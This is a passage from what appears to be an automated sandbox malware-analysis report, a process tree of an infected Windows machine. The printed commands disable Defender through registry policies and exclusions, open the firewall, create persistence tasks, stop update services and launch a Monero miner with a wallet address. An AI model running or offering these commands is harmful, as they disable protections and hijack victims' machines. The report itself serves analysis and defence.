                                                          "C:\Users\Admin\Pictures\BDd6IRH5LzQ1I2TlVST8HXix.exe"
                                                          9⤵
                                                            PID:1916
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:3428
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                              10⤵
                                                                PID:4152
                                                                • C:\Windows\system32\netsh.exe
                                                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                  11⤵
                                                                  • Modifies Windows Firewall
                                                                  PID:704
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                10⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:1520
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                10⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:4976
                                                          • C:\Users\Admin\Pictures\oPPG4jcQq4FO97tiNCU0OaOx.exe
                                                            "C:\Users\Admin\Pictures\oPPG4jcQq4FO97tiNCU0OaOx.exe"
                                                            8⤵
                                                              PID:1648
                                                              • C:\Users\Admin\AppData\Local\Temp\7zSF315.tmp\Install.exe
                                                                .\Install.exe /tEdidDDf "385118" /S
                                                                9⤵
                                                                  PID:5336
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                    10⤵
                                                                      PID:4496
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                        11⤵
                                                                          PID:4564
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                            12⤵
                                                                              PID:2200
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                13⤵
                                                                                  PID:2644
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                              11⤵
                                                                                PID:3012
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                  12⤵
                                                                                    PID:6072
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      13⤵
                                                                                        PID:2016
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                    11⤵
                                                                                      PID:2520
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        12⤵
                                                                                          PID:3096
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                            13⤵
                                                                                              PID:5644
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                          11⤵
                                                                                            PID:4504
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              12⤵
                                                                                                PID:1684
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                  13⤵
                                                                                                    PID:4072
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                11⤵
                                                                                                  PID:3968
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    12⤵
                                                                                                      PID:2364
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                        13⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:5872
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                  10⤵
                                                                                                    PID:5948
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                      11⤵
                                                                                                        PID:4940
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                          12⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:2772
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 03:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF315.tmp\Install.exe\" it /XDZdidAPYb 385118 /S" /V1 /F
                                                                                                      10⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:1620
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                      10⤵
                                                                                                        PID:2116
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                          11⤵
                                                                                                            PID:3832
                                                                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                              12⤵
                                                                                                                PID:5252
                                                                                                      • C:\Users\Admin\Pictures\TYnU5V7HyDjjuNdxLhfVy84U.exe
                                                                                                        "C:\Users\Admin\Pictures\TYnU5V7HyDjjuNdxLhfVy84U.exe"
                                                                                                        8⤵
                                                                                                          PID:4580
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe
                                                                                                            .\Install.exe /tEdidDDf "385118" /S
                                                                                                            9⤵
                                                                                                              PID:2720
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                10⤵
                                                                                                                  PID:5352
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    11⤵
                                                                                                                      PID:6136
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                      11⤵
                                                                                                                        PID:4820
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          12⤵
                                                                                                                            PID:5252
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                              13⤵
                                                                                                                                PID:5752
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                            11⤵
                                                                                                                              PID:1608
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                12⤵
                                                                                                                                  PID:5508
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                    13⤵
                                                                                                                                      PID:3452
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                  11⤵
                                                                                                                                    PID:5112
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                      12⤵
                                                                                                                                        PID:3876
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                          13⤵
                                                                                                                                            PID:2828
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                        11⤵
                                                                                                                                          PID:5480
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                            12⤵
                                                                                                                                              PID:5440
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                13⤵
                                                                                                                                                  PID:5936
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                              11⤵
                                                                                                                                                PID:5564
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                  12⤵
                                                                                                                                                    PID:2672
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                      13⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:428
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                10⤵
                                                                                                                                                  PID:5596
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4072
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                        12⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:3584
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 03:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe\" it /lAwdideDrP 385118 /S" /V1 /F
                                                                                                                                                    10⤵
                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                    PID:1612
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:2008
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                        11⤵
                                                                                                                                                          PID:5620
                                                                                                                                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                            12⤵
                                                                                                                                                              PID:5756
                                                                                                                                                    • C:\Users\Admin\Pictures\Oz1RC5AcnAXtXmEhaeOT6Fq4.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Oz1RC5AcnAXtXmEhaeOT6Fq4.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:3344
                                                                                                                                                      • C:\Users\Admin\Pictures\LpB8grsSLC0suCuVOQtl4myy.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\LpB8grsSLC0suCuVOQtl4myy.exe"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5596
                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                            9⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:2096
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                            9⤵
                                                                                                                                                              PID:5372
                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:5044
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                9⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:4056
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                9⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:5856
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                9⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:4624
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                9⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:2700
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                9⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:5340
                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:6068
                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:5876
                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:3340
                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:5272
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:2748
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5852
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5916
                                                                                                                                                                  • C:\ProgramData\system.exe
                                                                                                                                                                    "C:\ProgramData\system.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:5376
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5964
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:3168
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5240
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5396
                                                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:4040
                                                                                                                                                                  • C:\ProgramData\build.exe
                                                                                                                                                                    "C:\ProgramData\build.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:5472
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 1308
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5648
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000014001\0e62ba0552.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000014001\0e62ba0552.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              PID:3708
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          PID:4156
                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                          "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2768
                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4308
                                                                                                                                                            • C:\Windows\Temp\223613.exe
                                                                                                                                                              "C:\Windows\Temp\223613.exe" --list-devices
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:4604
                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                          "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1372
                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4956
                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                          "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5524
                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5660
                                                                                                                                                            • C:\Windows\Temp\830102.exe
                                                                                                                                                              "C:\Windows\Temp\830102.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:5744
                                                                                                                                                            • C:\Windows\Temp\339827.exe
                                                                                                                                                              "C:\Windows\Temp\339827.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:5412
                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5448
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5916 -ip 5916
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5584
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                              • Checks BIOS information in registry
